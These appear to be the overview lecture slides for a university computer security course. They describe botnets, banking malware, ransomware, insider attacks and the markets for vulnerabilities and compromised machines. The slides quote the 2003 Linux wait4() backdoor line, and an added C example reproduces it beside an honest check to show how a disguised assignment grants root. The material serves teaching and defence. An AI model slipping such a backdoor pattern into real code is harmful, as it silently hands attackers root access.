Computer Security - cs155.stanford.edu

https://cs155.stanford.edu

CS155 Computer Security: Course overview
Dan Boneh

The computer security problem
  Lots of buggy software
  Social engineering is very effective
  Money can be made from finding and exploiting vulns.
    1. Marketplace for vulnerabilities
    2. Marketplace for owned machines (PPI)
    3. Many methods to profit from owned machines

Current state of computer security
  Source: https://www.cvedetails.com/top-50-products.php?year=2018

Vulnerable applications being exploited
  Office, Android, Java, Browser
  Source: Kaspersky Security Bulletin 2017

Sample attacks

Why own client machines: 1. IP address and bandwidth stealing
  Attacker's goal: look like a random Internet user
  Use the IP address of the infected machine or phone for:
    Spam (e.g. the Storm botnet)
      Spamalytics: 1 in 12M pharma spams leads to a purchase;
                   1 in 260K greeting-card spams leads to an infection
    Denial of Service: services sold at 1 hour ($20), 24 hours ($100)
    Click fraud (e.g. Clickbot.a)

Why own machines: 2. Steal user credentials, crypto miners
  Keylog for banking passwords, web passwords, gaming passwords.
  Example: SilentBanker (and many like it), a Man-in-the-Browser (MITB) attack:
    User requests login page
    Bank sends the login page needed to log in
    Malware injects JavaScript into the page
    When the user submits information, it is also sent to the attacker
  Similar mechanism used by the Zeus botnet

Lots of financial malware
  Records banking passwords via keylogger
  Spread via spam email and hacked web sites
  Maintains access to the PC for future installs
  Source: Kaspersky Security Bulletin 2017

Users attacked: stats
  300,000 users/month worldwide; a worldwide problem
  Source: Kaspersky Security Bulletin 2015

Why own machines: 3. Ransomware
  A worldwide problem

WannaCry ransomware
  Worm spreads via a vuln. in SMB (port 445)
  Apr. 14, 2017: EternalBlue vuln. released by ShadowBrokers
  May 12, 2017: Worm detected (3 weeks to weaponize)

Ransomware in 2017: # users attacked
  Source: Kaspersky Security Bulletin 2017

Why own machines: 4. Spread to isolated systems
  Example: Stuxnet
    Windows infection
    Siemens PCS 7 SCADA control software on Windows
    Siemens device controller on an isolated network
  More on this later in the course

Server-side attacks
  Data theft: credit card numbers, intellectual property
    Example: Equifax (July 2017), 143M customers' data impacted
    Exploited a known vulnerability in Apache Struts (RCE)
    Many similar (smaller) attacks since 2000
  Political motivation: DNC, Tunisia Facebook (Feb. 2011), GitHub (Mar. 2015)
  Infect visiting users

Infecting visiting users: Mpack
  PHP-based tools installed on compromised web sites
    Embedded as an iframe on the infected page
    Infects browsers that visit the site
  Features
    Management console provides stats on infection rates
    Sold for several hundred dollars
    Customer care can be purchased: one-year support contract
  Impact: 500,000 infected sites (compromised via SQL injection)
  Several defenses: e.g. Google Safe Browsing

Types of data stolen
  Source: California breach notification report, 2015 (2012-2015)

How companies lose data
  Pie chart categories: malware/hacking, insider error, insider misuse/attack, lost/stolen laptops
  Shares shown: 54.00%, 22.00%, 17.00%, 7.00%
  How do we have this data? Source: California breach notification report, 2016

Insider attacks: example
  Hidden trap door in Linux (Nov. 2003)
    Allows an attacker to take over a computer
    Practically undetectable change (uncovered via CVS logs)
  Inserted line in wait4():

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

  Looks like a standard error check, but ...
  See: http://lwn.net/Articles/57135/

Many more examples
  Access to SIPRnet and a CD-RW: 260,000 cables (Wikileaks)
  SysAdmin for the city of SF government changed passwords, locking the city out of router access
  Insider logic bomb took down 2000 UBS servers
  Can security technology help?

Introduction: The Marketplace for Vulnerabilities
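As an added illustration (not from the slides or the kernel), the C program below models the inserted wait4() line above side by side with the honest comparison it imitates; the struct task, the option bits and both check functions are constructed for this example.

```c
#include <errno.h>
#include <stdio.h>

/* Constructed stand-in for the kernel's task struct (not kernel code):
 * only the field the inserted line touched is modelled. uid 0 is root. */
struct task {
    unsigned int uid;
};

/* Constructed option bits standing in for __WCLONE and __WALL; only the
 * fact that both must be set matters for the logic. */
#define WCLONE_BIT 0x80000000u
#define WALL_BIT   0x40000000u

/* The inserted line as quoted on the slide. "current->uid = 0" is an
 * assignment, not a comparison: it evaluates to 0, so the condition is
 * always false and retval is never set to -EINVAL. The side effect is
 * that the caller's uid becomes 0 (root) whenever the option pair is
 * passed, which is why a one-character diff in an "error check" was a
 * complete privilege escalation. */
static int backdoored_check(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (WCLONE_BIT | WALL_BIT)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What a genuine error check with the same shape does: reject the option
 * pair for root and modify nothing. A code review should expect this form. */
static int honest_check(const struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (WCLONE_BIT | WALL_BIT)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

int main(void)
{
    struct task t = { .uid = 1000 };   /* constructed unprivileged caller */
    int r = backdoored_check(&t, WCLONE_BIT | WALL_BIT);
    printf("backdoored: retval=%d uid=%u\n", r, t.uid);  /* retval=0 uid=0 */

    t.uid = 1000;
    r = honest_check(&t, WCLONE_BIT | WALL_BIT);
    printf("honest:     retval=%d uid=%u\n", r, t.uid);  /* retval=0 uid=1000 */
    return 0;
}
```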

Marketplace for Vulnerabilities
  Option 1: bug bounty programs (many)
    Google Vulnerability Reward Program: up to $31,337
    Microsoft Bounty Program: up to $100K
    Apple Bug Bounty program: up to $200K (secure boot firmware)
    Pwn2Own competition: $15K
  Option 2: Zerodium (2019): up to $2M for iOS, $500K for Android, many others

Example: Mozilla

Marketplace for Vulnerabilities (Zerodium payouts)
  RCE: remote code execution
  LPE: local privilege escalation
  SBX: sandbox escape
  RJB: remote jailbreak
  Source: Zerodium payouts

Marketplace for owned machines
  Pay-per-install (PPI) services
  PPI operation:
    1. Own the victim's machine
    2. Download and install the client's code (e.g. spam bot, keylogger)
    3. Charge the client
  Diagram: clients -> PPI service -> victims
  Source: Caballero et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)

Marketplace for owned machines: cost
  US: $100-180 / 1000 machines
  Asia: $7-8 / 1000 machines
  Source: Caballero et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)

This course
  Goals:
    Be aware of exploit techniques
    Learn to defend against and avoid common exploits
    Learn to architect secure systems

This course
  Part 1: basics (architecting for security)
    Securing apps, OS, and legacy code
    Isolation, authentication, and access control
  Part 2: Web security (defending against a web attacker)
    Building robust web sites, understanding the browser security model
  Part 3: network security (defending against a network attacker)
    Monitoring and architecting secure networks
  Part 4: securing mobile applications

Don't try this at home!

Ken Thompson's clever Trojan
